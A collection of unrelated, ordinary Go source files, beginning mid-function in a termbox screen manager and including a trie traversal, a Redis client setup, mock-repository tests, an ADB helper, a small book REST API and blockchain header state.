			// Ctrl-C is the hard exit; anything else goes to the screen.
			if event.Key == termbox.KeyCtrlC {
				break
			} else {
				newScreenIndex := m.handleKeyEvent(event)
				// An unknown screen id from a handler also ends the loop.
				if err := m.SetDisplayScreen(newScreenIndex); err != nil {
					break
				}
				m.layoutAndDrawScreen()
			}
		} else if event.Type == termbox.EventNone {
			// Type = EventNone is how we can trigger automatic events
			newScreenIndex := m.handleNoneEvent(event)
			if err := m.SetDisplayScreen(newScreenIndex); err != nil {
				break
			}
			m.layoutAndDrawScreen()
		} else if event.Type == termbox.EventResize {
			m.resizeScreen()
			m.layoutAndDrawScreen()
		}
	}
	m.running = false
	close(m.events)
	m.Close()
	return nil
}
// SendNoneEvent injects a synthetic EventNone, used to trigger automatic
// redraws (see pollRefreshEvents).
func (m *Manager) SendNoneEvent() {
	m.SendEvent(termbox.Event{Type: termbox.EventNone})
}
// SendEvent queues an event for the Loop goroutine to process (blocks until
// Loop receives it).
func (m *Manager) SendEvent(t termbox.Event) {
	m.events <- t
}
// Close shuts termbox down, restoring the terminal.
func (m *Manager) Close() {
	termbox.Close()
}
// pollUserEvents forwards termbox input events into m.events while the loop
// is running.
//
// NOTE(review): m.running is read without synchronization, and a final send
// can race with Loop closing m.events — confirm intended shutdown behavior.
func (m *Manager) pollUserEvents() {
	for m.running {
		m.SendEvent(termbox.PollEvent())
	}
}
// SetRefreshRate sets the period for automatic EventNone injection and
// starts the refresh goroutine.
//
// NOTE(review): each call spawns another pollRefreshEvents goroutine; calling
// this more than once leaks the earlier ones.
func (m *Manager) SetRefreshRate(t time.Duration) {
	m.refreshRate = t
	go m.pollRefreshEvents()
}
// pollRefreshEvents periodically injects EventNone at the configured rate;
// rates of a microsecond or less (including NoRefresh) disable it entirely.
func (m *Manager) pollRefreshEvents() {
	if m.refreshRate > time.Microsecond {
		for m.running {
			time.Sleep(m.refreshRate)
			m.SendNoneEvent()
		}
	}
}
// handleKeyEvent forwards a key event to the active screen; the return value
// is the id of the screen to display next.
func (m *Manager) handleKeyEvent(event termbox.Event) int {
	return m.screens[m.displayScreenId].HandleKeyEvent(event)
}
// handleNoneEvent forwards a synthetic refresh event to the active screen;
// the return value is the id of the screen to display next.
func (m *Manager) handleNoneEvent(event termbox.Event) int {
	return m.screens[m.displayScreenId].HandleNoneEvent(event)
}
// resizeScreen notifies the active screen of a terminal resize.
func (m *Manager) resizeScreen() {
	m.screens[m.displayScreenId].ResizeScreen()
}
// drawBackground clears the terminal using the configured background color.
func (m *Manager) drawBackground() {
	termbox.Clear(0, m.defaultBg)
}
// layoutAndDrawScreen clears, lets the active screen draw itself, and
// flushes the termbox back buffer to the terminal.
func (m *Manager) layoutAndDrawScreen() {
	m.drawBackground()
	m.screens[m.displayScreenId].DrawScreen()
	termbox.Flush()
}
|
package graph
import "github.com/hectorhammett/graphs/node"
// Graph defines a generic graph interface.
type Graph interface {
	// AddVertice adds an edge between the two given nodes.
	// NOTE(review): "Vertice" is a nonstandard spelling of "vertex";
	// renaming would break implementers, so it is only flagged here.
	AddVertice(node.Node, node.Node)
	// GetNodesList returns all nodes — presumably keyed by a node
	// identifier; confirm against implementations.
	GetNodesList() map[string]node.Node
	// GetAdjacencyList returns the neighbor lists for every node.
	GetAdjacencyList() map[string][]node.Node
	// GetNodeAdjacencyList returns the neighbors of one node.
	GetNodeAdjacencyList(node.Node) []node.Node
	// GetNode looks up a node by its key.
	GetNode(string) node.Node
}
|
// Copyright 2018 The Cockroach Authors.
//
// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package ordering
import (
"github.com/cockroachdb/cockroach/pkg/sql/opt"
"github.com/cockroachdb/cockroach/pkg/sql/opt/memo"
"github.com/cockroachdb/cockroach/pkg/sql/opt/props"
"github.com/cockroachdb/cockroach/pkg/sql/opt/props/physical"
)
// mutationCanProvideOrdering reports whether a mutation operator can satisfy
// the required ordering. It always can, by passing the requirement through
// to its input.
func mutationCanProvideOrdering(expr memo.RelExpr, required *physical.OrderingChoice) bool {
	// The mutation operator can always pass through ordering to its input.
	return true
}
// mutationBuildChildReqOrdering translates the ordering required of the
// mutation operator into the ordering required of its input (child 0),
// remapping each column group through the operator's MutationPrivate.
// Children other than the input get no ordering requirement.
func mutationBuildChildReqOrdering(
	parent memo.RelExpr, required *physical.OrderingChoice, childIdx int,
) physical.OrderingChoice {
	if childIdx != 0 {
		return physical.OrderingChoice{}
	}
	// Remap each of the required columns to corresponding input columns.
	private := parent.Private().(*memo.MutationPrivate)
	optional := private.MapToInputCols(required.Optional)
	columns := make([]physical.OrderingColumnChoice, len(required.Columns))
	for i := range required.Columns {
		colChoice := &required.Columns[i]
		columns[i] = physical.OrderingColumnChoice{
			Group:      private.MapToInputCols(colChoice.Group),
			Descending: colChoice.Descending,
		}
	}
	return physical.OrderingChoice{Optional: optional, Columns: columns}
}
// mutationBuildProvided derives the ordering the mutation operator actually
// provides from its input's provided ordering, remapped onto the mutation's
// output columns.
func mutationBuildProvided(expr memo.RelExpr, required *physical.OrderingChoice) opt.Ordering {
	private := expr.Private().(*memo.MutationPrivate)
	input := expr.Child(0).(memo.RelExpr)
	provided := input.ProvidedPhysical().Ordering
	// Construct FD set that includes mapping to/from input columns. This will
	// be used by remapProvided.
	var fdset props.FuncDepSet
	fdset.CopyFrom(&input.Relational().FuncDeps)
	private.AddEquivTableCols(expr.Memo().Metadata(), &fdset)
	// Ensure that provided ordering only uses projected columns.
	return remapProvided(provided, &fdset, expr.Relational().OutputCols)
}
|
package mpt
import "errors"
// GetAllKeyValuePairs returns every key/value pair stored in the trie as a
// map, or nil when the trie is empty. Traversal errors are swallowed and
// whatever was accumulated before the failure is returned.
func (mpt *MerklePatriciaTrie) GetAllKeyValuePairs() map[string]string {
	if len(mpt.db) == 0 {
		return nil
	}
	pairs := make(map[string]string)
	root := mpt.db[mpt.Root]
	result, err := mpt.GetAllKeyValuePairsHelper(pairs, root, []uint8{})
	if err != nil {
		// The helper mutates pairs in place, so partial results survive.
		return pairs
	}
	return result
}
// GetAllKeyValuePairsHelper walks the trie depth-first from thisNode,
// accumulating every key/value pair into mptKeyValuePairs (mutated in
// place). hexPath is the hex-nibble path from the root to thisNode.
//
// NOTE(review): errors from recursive calls are discarded — only an unknown
// node_type at the current level is reported. The branch-case append aliases
// the caller's backing array; the depth-first order appears to make this
// safe, but confirm before refactoring.
func (mpt *MerklePatriciaTrie) GetAllKeyValuePairsHelper(mptKeyValuePairs map[string]string, thisNode Node, hexPath []uint8) (map[string]string, error) {
	currentHexPath := hexPath
	switch {
	// node_type 1: branch node — recurse into each non-empty child slot.
	case thisNode.node_type == 1:
		for i := 0; i < 16; i++ {
			if thisNode.branch_value[i] != "" {
				newcurrentHexPath := append(currentHexPath, uint8(i)) //int should be treated as part of ascii path
				mpt.GetAllKeyValuePairsHelper(mptKeyValuePairs, mpt.db[thisNode.branch_value[i]], newcurrentHexPath)
			}
		}
		// Slot 16 holds a value that terminates exactly at this branch.
		if thisNode.branch_value[16] != "" {
			key := HexArraytoString(currentHexPath)
			mptKeyValuePairs[key] = thisNode.branch_value[16]
		}
	// node_type 2 + extension prefix: extend the path and follow the child.
	case thisNode.node_type == 2 && is_ext_node(thisNode.flag_value.encoded_prefix) == true:
		thisNodePath := compact_decode(thisNode.flag_value.encoded_prefix)
		currentHexPath := append(currentHexPath, thisNodePath...) //int should be treated as part of ascii path
		mpt.GetAllKeyValuePairsHelper(mptKeyValuePairs, mpt.db[thisNode.flag_value.value], currentHexPath)
	// node_type 2 + leaf prefix: the remaining path completes a key.
	case thisNode.node_type == 2 && is_ext_node(thisNode.flag_value.encoded_prefix) == false:
		thisNodePath := compact_decode(thisNode.flag_value.encoded_prefix)
		currentHexPath := append(currentHexPath, thisNodePath...)
		key := HexArraytoString(currentHexPath)
		mptKeyValuePairs[key] = thisNode.flag_value.value
	default:
		return nil, errors.New("Error in contructing key Value map from MPT")
	}
	return mptKeyValuePairs, nil
}
|
package redis
import (
"fmt"
"github.com/go-redis/redis"
"time"
)
// RedisConfig is the struct holding the Redis connection configuration.
// (The original comment incorrectly said "Postgres".)
type RedisConfig struct {
	Host     string
	Port     string
	Password string
	Key      string
}
// REDIS_DB is the logical Redis database index used by the client.
const REDIS_DB = 0
// ConfigStore abstracts the configuration source used by New.
type ConfigStore interface {
	GetKey(string) string
}
// Token pairs a stored value with its expiration duration.
type Token struct {
	Value  string
	Expire time.Duration
}
// client is the package-level Redis client, initialised by New.
var client *redis.Client
// New initializes the redis
func New(config ConfigStore) error {
var redisConfig RedisConfig
// set redis config from env
redisConfig = RedisConfig{
Host: config.GetKey("redis.host"),
Port: config.GetKey("redis.port"),
Password: config.GetKey("redis.password"),
Key: config.GetKey("redis.key"),
}
client = redis.NewClient(&redis.Options{
Addr: fmt.Sprintf("%s:%s", redisConfig.Host, redisConfig.Port),
Password: fmt.Sprintf("%s", redisConfig.Password), // no password set
DB: REDIS_DB, // use default DB
})
_, err := client.Ping().Result()
if err != nil {
return err
}
return nil
} |
package reltest
import (
"context"
"io"
"testing"
"github.com/go-rel/rel"
"github.com/stretchr/testify/assert"
)
// TestIterate exercises repo.Iterate against struct, struct-pointer, slice
// and slice-pointer mock results, asserting the iterator yields exactly
// `count` records before io.EOF.
func TestIterate(t *testing.T) {
	tests := []struct {
		name   string
		result interface{}
		count  int
	}{
		{
			name:   "struct",
			result: Book{ID: 1},
			count:  1,
		},
		{
			name:   "struct pointer",
			result: &Book{ID: 1},
			count:  1,
		},
		{
			name:   "slice",
			result: []Book{{ID: 1}, {ID: 2}},
			count:  2,
		},
		{
			name:   "slice pointer",
			result: &[]Book{{ID: 1}, {ID: 2}},
			count:  2,
		},
	}
	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			var (
				book  Book
				repo  = New()
				query = rel.From("users")
			)
			repo.ExpectIterate(query, rel.BatchSize(500)).Result(test.result)
			var (
				count = 0
				it    = repo.Iterate(context.TODO(), query, rel.BatchSize(500))
			)
			defer it.Close()
			// The iterator signals exhaustion with io.EOF.
			for {
				if err := it.Next(&book); err == io.EOF {
					break
				} else {
					assert.Nil(t, err)
				}
				assert.NotEqual(t, 0, book.ID)
				count++
			}
			assert.Equal(t, test.count, count)
			repo.AssertExpectations(t)
		})
	}
}
// TestIterate_single covers the default-options path: a single mock record
// with no batch size.
func TestIterate_single(t *testing.T) {
	var (
		book  Book
		repo  = New()
		query = rel.From("users")
	)
	repo.ExpectIterate(query).Result(Book{ID: 1})
	count := 0
	it := repo.Iterate(context.TODO(), query)
	defer it.Close()
	for {
		if err := it.Next(&book); err == io.EOF {
			break
		} else {
			assert.Nil(t, err)
		}
		assert.NotEqual(t, 0, book.ID)
		count++
	}
	assert.Equal(t, 1, count)
	repo.AssertExpectations(t)
}
// TestIterate_error verifies that a mocked connection failure surfaces from
// the first Next call.
func TestIterate_error(t *testing.T) {
	var (
		book  Book
		repo  = New()
		query = rel.From("users")
	)
	repo.ExpectIterate(query).ConnectionClosed()
	it := repo.Iterate(context.TODO(), query)
	defer it.Close()
	assert.Equal(t, ErrConnectionClosed, it.Next(&book))
	repo.AssertExpectations(t)
}
// TestIterate_assert verifies that calling Iterate with a query that does
// not match the expectation panics, and that the unmet expectation is
// reported. `nt` appears to be a package-level mock testing.T defined
// elsewhere in this package — confirm there.
func TestIterate_assert(t *testing.T) {
	var (
		repo = New()
	)
	repo.ExpectIterate(rel.From("users"), rel.BatchSize(10))
	assert.Panics(t, func() {
		repo.Iterate(context.TODO(), rel.From("books"))
	})
	assert.False(t, repo.AssertExpectations(nt))
	assert.Equal(t, "FAIL: Mock defined but not called:\nIterate(ctx, rel.From(\"users\"), rel.BatchSize(10))", nt.lastLog)
}
// TestIterate_assert_transaction verifies the unmet-expectation message for
// an Iterate mocked inside a transaction.
func TestIterate_assert_transaction(t *testing.T) {
	var (
		repo = New()
	)
	repo.ExpectTransaction(func(repo *Repository) {
		repo.ExpectIterate(rel.From("users"), rel.BatchSize(10))
	})
	assert.False(t, repo.AssertExpectations(nt))
	assert.Equal(t, "FAIL: Mock defined but not called:\n<Transaction: 1> Iterate(ctx, rel.From(\"users\"), rel.BatchSize(10))", nt.lastLog)
}
// TestIterate_String pins the human-readable renderings of a MockIterate
// used in assertion failure messages.
func TestIterate_String(t *testing.T) {
	var (
		mockIterate = MockIterate{assert: &Assert{}, argQuery: rel.From("users"), argOptions: []rel.IteratorOption{rel.BatchSize(10), rel.Start(1), rel.Finish(10)}}
	)
	assert.Equal(t, "Iterate(ctx, rel.From(\"users\"), rel.BatchSize(10), rel.Start(1), rel.Finish(10))", mockIterate.String())
	assert.Equal(t, "ExpectIterate(rel.From(\"users\"), rel.BatchSize(10), rel.Start(1), rel.Finish(10))", mockIterate.ExpectString())
}
|
package tableModel
// AdminUserBase holds the admin-user fields shared by read and write models.
//
// Author: 晴小篆 331393627@qq.com
//
// Role values:
//   1 - super administrator
//   2 - regular user
type AdminUserBase struct {
	ID     uint   `json:"id" gorm:"primarykey"`
	Name   string `json:"name" gorm:"not null" valid:"required~缺少用户名"`
	Avatar string `json:"avatar" gorm:"comment:头像"`
	Email  string `json:"email" gorm:"comment:邮箱"`
	Role   string `json:"role" gorm:"comment:角色" valid:"required~缺少角色"`
}
// AdminUser is the persisted admin-user model: the shared base fields plus
// the password and the common model fields (ModelStruct).
type AdminUser struct {
	AdminUserBase
	Password string `json:"password" gorm:"not null" valid:"required~缺少密码"`
	ModelStruct
}
|
package test
import (
"time"
"github.com/juntaki/transparent"
)
// NewSource returns a source Layer backed by the test Storage constructed
// with the given wait duration.
//
// NOTE(review): the error from transparent.NewLayerSource is discarded; if
// construction can fail, a nil layer would be returned silently.
func NewSource(wait time.Duration) transparent.Layer {
	test := NewStorage(wait)
	layer, _ := transparent.NewLayerSource(test)
	return layer
}
|
// Copyright 2020 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// Package adb enables controlling android devices through the local adb server.
package adb
import (
"context"
"os"
"path/filepath"
"syscall"
"github.com/shirou/gopsutil/v3/process"
"chromiumos/tast/common/testexec"
"chromiumos/tast/errors"
"chromiumos/tast/testing"
)
const (
	// adbHome is a writable directory handed to adb as $HOME.
	adbHome = "/tmp/adb_home"
)
// Command creates an ADB command with appropriate environment variables:
// ADB_VENDOR_KEYS pointing at the vendor key (see vendorKeyPath) and a
// writable HOME under /tmp.
func Command(ctx context.Context, args ...string) *testexec.Cmd {
	cmd := testexec.CommandContext(ctx, "adb", args...)
	cmd.Env = append(
		os.Environ(),
		"ADB_VENDOR_KEYS="+vendorKeyPath(),
		// adb expects $HOME to be writable.
		"HOME="+adbHome)
	return cmd
}
// KillADBLocalServer kills the existing ADB local server if it is running.
//
// We do not use adb kill-server since it is unreliable (crbug.com/855325).
// We do not use killall since it can wait for orphan adb processes indefinitely (b/137797801).
func KillADBLocalServer(ctx context.Context) error {
	ps, err := process.Processes()
	if err != nil {
		return err
	}
	for _, p := range ps {
		// Only consider processes named "adb"...
		if name, err := p.Name(); err != nil || name != "adb" {
			continue
		}
		// ...whose parent is init (ppid 1), i.e. the daemonized local
		// server rather than a client still attached to a shell.
		if ppid, err := p.Ppid(); err != nil || ppid != 1 {
			continue
		}
		if err := syscall.Kill(int(p.Pid), syscall.SIGKILL); err != nil {
			// In a very rare race condition, the server process might be already gone.
			// Just log the error rather than reporting it to the caller.
			testing.ContextLog(ctx, "Failed to kill ADB local server process: ", err)
			continue
		}
		// Wait for the process to exit for sure.
		// This may take as long as 10 seconds due to busy init process.
		if err := testing.Poll(ctx, func(ctx context.Context) error {
			// We need a fresh process.Process since it caches attributes.
			if _, err := process.NewProcess(p.Pid); err == nil {
				return errors.Errorf("pid %d is still running", p.Pid)
			}
			return nil
		}, nil); err != nil {
			return errors.Wrap(err, "failed on waiting for ADB local server process to exit")
		}
	}
	return nil
}
// apkPathPrefix is the directory where local helper APKs are installed.
const apkPathPrefix = "/usr/local/libexec/tast/apks/local/cros"

// APKPath returns the absolute path to a helper APK.
func APKPath(value string) string {
	p := filepath.Join(apkPathPrefix, value)
	return p
}
|
// description : IntSet library tester
// author : Tom Geudens (https://github.com/tomgeudens/)
// modified : 2016/07/15
//
package main
import (
"fmt"
"github.com/tomgeudens/the_go_programming_language/intset"
)
// Package-level sets exercised by main; their zero values are usable.
var x intset.IntSet
var y intset.IntSet
var z intset.IntSet

// main exercises the intset package — construction, union, intersection,
// difference, symmetric difference, membership, copy/clear and element
// listing — printing the state after each step. Method calls rely on Go's
// automatic address-taking for addressable variables, so the explicit
// (&x). prefixes of the original are unnecessary.
func main() {
	fmt.Printf("length x : %d\n", x.Len())
	x.Add(1)
	x.Add(144)
	x.Add(9)
	fmt.Printf("length x : %d\n", x.Len())
	fmt.Println("x = " + x.String())
	fmt.Printf("length y : %d\n", y.Len())
	y.Add(9)
	y.Add(42)
	fmt.Printf("length y : %d\n", y.Len())
	fmt.Println("y = " + y.String())
	x.UnionWith(&y)
	fmt.Printf("length x : %d\n", x.Len())
	fmt.Printf("length y : %d\n", y.Len())
	fmt.Println("x = " + x.String())
	fmt.Println(x.Has(9), x.Has(123))
	x.Remove(42)
	fmt.Printf("length x : %d\n", x.Len())
	fmt.Println("x = " + x.String())
	z = *y.Copy()
	y.Clear()
	fmt.Printf("length y : %d\n", y.Len())
	fmt.Println("y = " + y.String())
	fmt.Printf("length z : %d\n", z.Len())
	fmt.Println("z = " + z.String())
	y.AddAll(1, 2, 3)
	fmt.Printf("length y : %d\n", y.Len())
	fmt.Println("y = " + y.String())
	z.Add(255)
	fmt.Printf("length z : %d\n", z.Len())
	fmt.Println("z = " + z.String())
	z.IntersectWith(&x)
	fmt.Printf("length z : %d\n", z.Len())
	fmt.Println("z = " + z.String())
	x.DifferenceWith(&z)
	fmt.Printf("length x : %d\n", x.Len())
	fmt.Println("x = " + x.String())
	x.SymmetricDifferenceWith(&y)
	fmt.Printf("length x : %d\n", x.Len())
	fmt.Println("x = " + x.String())
	fmt.Println(x.Elems())
	fmt.Println(y.Elems())
	fmt.Println(z.Elems())
}
|
// gRPC service
package main
import (
"net"
"os"
"github.com/romana/rlog"
"github.com/youngderekm/grpc-cookies-example/servicedef"
"google.golang.org/grpc"
"google.golang.org/grpc/reflection"
)
// server is the struct that our gRPC service methods will be bound to.
type server struct {
}
// main starts the gRPC auth service on localhost:50051 with server
// reflection enabled, exiting the process on listen/serve failure.
func main() {
	// log at debug for this demo
	os.Setenv("RLOG_LOG_LEVEL", "DEBUG")
	rlog.UpdateEnv()
	// Create the grpc server
	grpcServer := grpc.NewServer()
	authServer := server{}
	// Register our service
	servicedef.RegisterAuthApiServer(grpcServer, &authServer)
	// Set up the listener
	hostAndPort := "localhost:50051"
	lis, err := net.Listen("tcp", hostAndPort)
	if err != nil {
		rlog.Criticalf("API server failed on net.Listen: %v", err)
		os.Exit(1)
	}
	rlog.Infof("Listening for gRPC requests at %s", hostAndPort)
	reflection.Register(grpcServer) // Register reflection service on gRPC api.
	// Serve blocks until the server stops.
	if err := grpcServer.Serve(lis); err != nil {
		rlog.Criticalf("API server failed on grpc Serve: %v", err)
		os.Exit(1)
	}
}
|
package kids
import (
"reflect"
"testing"
)
// examples are table-driven cases for kidsWithCandies — presumably LeetCode
// 1431 semantics (want[i] is whether kid i plus extraCandies reaches the
// current maximum); confirm against the kidsWithCandies implementation.
var examples = []struct {
	want         []bool
	candies      []int
	extraCandies int
}{
	{
		want:         []bool{true, true, true, false, true},
		candies:      []int{2, 3, 5, 1, 3},
		extraCandies: 3,
	},
	{
		want:         []bool{true, false, false, false, false},
		candies:      []int{4, 2, 1, 1, 2},
		extraCandies: 1,
	},
	{
		want:         []bool{true, false, true},
		candies:      []int{12, 1, 12},
		extraCandies: 10,
	},
}
// Test_kidsWithCandies_examples runs kidsWithCandies over the example table,
// comparing with reflect.DeepEqual and failing fast on the first mismatch.
func Test_kidsWithCandies_examples(t *testing.T) {
	for i, e := range examples {
		got := kidsWithCandies(e.candies, e.extraCandies)
		if !reflect.DeepEqual(e.want, got) {
			t.Fatalf(
				"\ni:%v candies:%v extraCandies:%v want:%v got:%v",
				i, e.candies, e.extraCandies, e.want, got,
			)
		}
	}
}
|
package main
import (
"encoding/json"
"errors"
"fmt"
"log"
"net/http"
"sort"
"github.com/gorilla/mux"
)
// book is one catalogue entry; db keys entries by Isbn.
type book struct {
	Isbn   string `json:"isbn"`
	Title  string `json:"title"`
	Author string `json:"author"`
}
// database facade: in-memory ISBN → book store, populated in main.
// NOTE(review): plain map access is not safe for concurrent HTTP handlers;
// confirm expected concurrency before production use.
var db map[string]book
// ---------------------------------------------------------
// GET /
// ---------------------------------------------------------
// indexPage handles the root path with a static greeting.
func indexPage(w http.ResponseWriter, r *http.Request) {
	fmt.Fprintf(w, "Welcome...")
}
// byTitle implements sort.Interface to order books alphabetically by Title.
type byTitle []book
func (m byTitle) Len() int { return len(m) }
func (m byTitle) Less(i, j int) bool { return m[i].Title < m[j].Title }
func (m byTitle) Swap(i, j int) { m[i], m[j] = m[j], m[i] }
// --------------------------------------------------------
// GET /books : return all books
// --------------------------------------------------------
// getBooks writes all books as a JSON array sorted by title.
func getBooks(w http.ResponseWriter, r *http.Request) {
	s := []book{}
	for _, value := range db {
		s = append(s, value)
	}
	// Map iteration order is random; sort for a deterministic response.
	sort.Sort(byTitle(s))
	out, err := json.Marshal(s)
	if err != nil {
		// Surface the failure instead of printing "error" to stdout and
		// sending a bogus 200 with an empty body.
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
	returnJSONResponse(w, out)
}
func returnJSONResponse(w http.ResponseWriter, out []byte) {
w.WriteHeader(http.StatusOK)
w.Header().Set("Content-Type", "application/json")
fmt.Fprintf(w, string(out))
}
// -----------------------------------------------------------------
// GET /books/{id}
// -----------------------------------------------------------------
// getBook writes the book identified by the {id} path variable as JSON,
// or 404 when it does not exist.
func getBook(w http.ResponseWriter, r *http.Request) {
	vars := mux.Vars(r)
	mybook, ok := db[vars["id"]]
	if !ok {
		w.WriteHeader(http.StatusNotFound)
		return
	}
	// Convert to JSON; surface marshal failures instead of printing "error"
	// to stdout and sending an empty 200 body.
	out, err := json.Marshal(mybook)
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
	returnJSONResponse(w, out)
}
// -----------------------------------------------------
// DELETE /books/{id}
// -----------------------------------------------------
// deleteBook removes the book identified by the {id} path variable,
// answering 404 when it does not exist and 200 on success.
func deleteBook(w http.ResponseWriter, r *http.Request) {
	id := mux.Vars(r)["id"]
	entry, ok := db[id]
	if !ok {
		w.WriteHeader(http.StatusNotFound)
		return
	}
	delete(db, entry.Isbn)
	w.WriteHeader(http.StatusOK)
}
// -------------------------------------------------------
// POST /books : add a book
// -------------------------------------------------------
// addBook decodes a book from the request body, validates it, stores it,
// and echoes it back as JSON with status 201.
func addBook(w http.ResponseWriter, r *http.Request) {
	var mybook book
	// convert posted json to struct
	decoder := json.NewDecoder(r.Body)
	if err := decoder.Decode(&mybook); err != nil {
		w.WriteHeader(http.StatusBadRequest)
		return
	}
	defer r.Body.Close()
	// check input
	if err := verify(&mybook); err != nil {
		// Status must be sent before any body bytes; the original wrote the
		// body first, which forced an implicit 200 OK. Fprint avoids using
		// err.Error() as a format string.
		w.WriteHeader(http.StatusBadRequest)
		fmt.Fprint(w, err.Error())
		return
	}
	// add to database
	db[mybook.Isbn] = mybook
	// convert back to json
	out, err := json.Marshal(mybook)
	if err != nil {
		w.WriteHeader(http.StatusInternalServerError)
		return
	}
	// Content-Type before WriteHeader, otherwise it is dropped.
	w.Header().Set("Content-Type", "application/json")
	w.WriteHeader(http.StatusCreated)
	w.Write(out)
}
// verify checks that the posted book has an ISBN and that it is not already
// present in the database.
func verify(mybook *book) error {
	if mybook.Isbn == "" {
		return errors.New("Missing Isbn")
	}
	if _, exists := db[mybook.Isbn]; exists {
		return errors.New("Duplicate Isbn")
	}
	return nil
}
// ----------------------------------------------------
// PUT /books : upate a book
// ---------------------------------------------------
// updateBook decodes a book from the request body and replaces the existing
// entry with the same ISBN, answering 400 for bad JSON or an unknown ISBN.
func updateBook(w http.ResponseWriter, r *http.Request) {
	var mybook book
	if err := json.NewDecoder(r.Body).Decode(&mybook); err != nil {
		w.WriteHeader(http.StatusBadRequest)
		return
	}
	defer r.Body.Close()
	if _, ok := db[mybook.Isbn]; !ok {
		// Unknown ISBN: nothing to update.
		w.WriteHeader(http.StatusBadRequest)
		return
	}
	db[mybook.Isbn] = mybook
	w.WriteHeader(http.StatusOK)
}
// runServer wires up the REST routes and serves on :8080 (blocks until the
// server exits; a serve failure terminates the process via log.Fatal).
func runServer() {
	r := mux.NewRouter()
	r.HandleFunc("/", indexPage)
	r.HandleFunc("/books", getBooks).Methods("GET")
	r.HandleFunc("/books/{id}", getBook).Methods("GET")
	r.HandleFunc("/books/{id}", deleteBook).Methods("DELETE")
	r.HandleFunc("/books", addBook).Methods("POST")
	r.HandleFunc("/books", updateBook).Methods("PUT")
	// The router is handed to ListenAndServe directly; the original also
	// registered it on the DefaultServeMux (http.Handle), which was never
	// used and has been removed.
	log.Fatal(http.ListenAndServe(":8080", r))
}
func main() {
db = make(map[string]book)
db["1"] = book{Isbn: "1", Title: "Star Wars", Author: "George Lucas"}
db["2"] = book{Isbn: "2", Title: "The Empire Strikes Back", Author: "George Lucas"}
db["3"] = book{Isbn: "3", Title: "Return Of The Jedi", Author: "George Lucas"}
runServer()
}
|
package main
import "fmt"
// main demonstrates sending and receiving on a channel.
//
// The original version deadlocked: a send on an unbuffered channel
// blocks until another goroutine is ready to receive, and main was
// both the only sender and the only receiver.  Giving the channel a
// buffer of one lets the send complete immediately, after which the
// receive drains the buffered value.
func main() {
	c := make(chan int, 1)
	c <- 42
	fmt.Println(<-c)
}
|
// SPDX-License-Identifier: ISC
// Copyright (c) 2014-2020 Bitmark Inc.
// Use of this source code is governed by an ISC
// license that can be found in the LICENSE file.
package blockheader
import (
"sync"
"github.com/bitmark-inc/bitmarkd/blockdigest"
"github.com/bitmark-inc/bitmarkd/fault"
"github.com/bitmark-inc/bitmarkd/genesis"
"github.com/bitmark-inc/bitmarkd/mode"
"github.com/bitmark-inc/logger"
)
// blockData holds the most recently seen block header, guarded by the
// embedded RWMutex.  All access goes through the exported functions
// of this package.
type blockData struct {
	sync.RWMutex // to allow locking

	log *logger.L // module logger, created in Initialise

	height            uint64             // this is the current block Height
	previousBlock     blockdigest.Digest // and its digest
	previousVersion   uint16             // plus its version
	previousTimestamp uint64             // plus its timestamp

	// set once during initialise; guards against double init/finalise
	initialised bool
}

// globalData is the single package-wide instance of blockData.
var globalData blockData
// Initialise - setup the current block data
//
// Creates the module logger, resets the header to the genesis block
// and marks the module as initialised.  Returns
// fault.AlreadyInitialised on a second call.
func Initialise() error {
	globalData.Lock()
	defer globalData.Unlock()

	// no need to start if already started
	if globalData.initialised {
		return fault.AlreadyInitialised
	}

	globalData.log = logger.New("blockheader")
	globalData.log.Info("starting…")

	setGenesis()

	globalData.log.Infof("block height: %d", globalData.height)
	globalData.log.Infof("previous block: %v", globalData.previousBlock)
	globalData.log.Infof("previous version: %d", globalData.previousVersion)

	// all data initialised
	globalData.initialised = true
	return nil
}
// Finalise - shutdown the block header system
//
// Takes the same lock as Initialise/Set/Get: the original read and
// cleared the initialised flag without holding the mutex, racing with
// any concurrent Initialise or Set.
func Finalise() error {
	globalData.Lock()
	defer globalData.Unlock()

	if !globalData.initialised {
		return fault.NotInitialised
	}

	globalData.log.Info("shutting down…")
	globalData.log.Flush()

	// finally...
	globalData.initialised = false

	globalData.log.Info("finished")
	globalData.log.Flush()

	return nil
}
// SetGenesis - reset the block data
//
// Thread-safe wrapper around the internal setGenesis.
func SetGenesis() {
	globalData.Lock()
	defer globalData.Unlock()
	setGenesis()
}
// internal: must hold lock
func setGenesis() {
globalData.height = genesis.BlockNumber
globalData.previousBlock = genesis.LiveGenesisDigest
globalData.previousVersion = 1
globalData.previousTimestamp = 0
if mode.IsTesting() {
globalData.previousBlock = genesis.TestGenesisDigest
}
}
// Set - set current header data
//
// Stores the supplied height, digest, version and timestamp under the
// write lock.
func Set(height uint64, digest blockdigest.Digest, version uint16, timestamp uint64) {
	globalData.Lock()
	defer globalData.Unlock()

	globalData.height = height
	globalData.previousBlock = digest
	globalData.previousVersion = version
	globalData.previousTimestamp = timestamp
}
// Get - return all header data
//
// Returns height, previous digest, previous version and previous
// timestamp as one consistent snapshot taken under the read lock.
func Get() (uint64, blockdigest.Digest, uint16, uint64) {
	globalData.RLock()
	height := globalData.height
	digest := globalData.previousBlock
	version := globalData.previousVersion
	timestamp := globalData.previousTimestamp
	globalData.RUnlock()
	return height, digest, version, timestamp
}
// GetNew - return block data for initialising a new block
// returns: previous block digest and the number for the new block
func GetNew() (blockdigest.Digest, uint64) {
	globalData.RLock()
	defer globalData.RUnlock()
	return globalData.previousBlock, globalData.height + 1
}
// Height - return current height
func Height() uint64 {
	globalData.RLock()
	height := globalData.height
	globalData.RUnlock()
	return height
}
|
package item
import (
"errors"
)
var (
	// ErrInvalidCategory is returned when a category string matches
	// none of the Category* constants below.
	ErrInvalidCategory = errors.New("category is not valid")
)

// Category identifiers as they appear in the external item data.
// Note that weapon-modification categories carry the bare part name
// (e.g. "barrel"), except the generic CategoryModification which is
// stored as "mod-other".
const (
	CategoryAmmunition               = "ammunition"
	CategoryArmor                    = "armor"
	CategoryBackpack                 = "backpack"
	CategoryBarter                   = "barter"
	CategoryClothing                 = "clothing"
	CategoryCommon                   = "common"
	CategoryContainer                = "container"
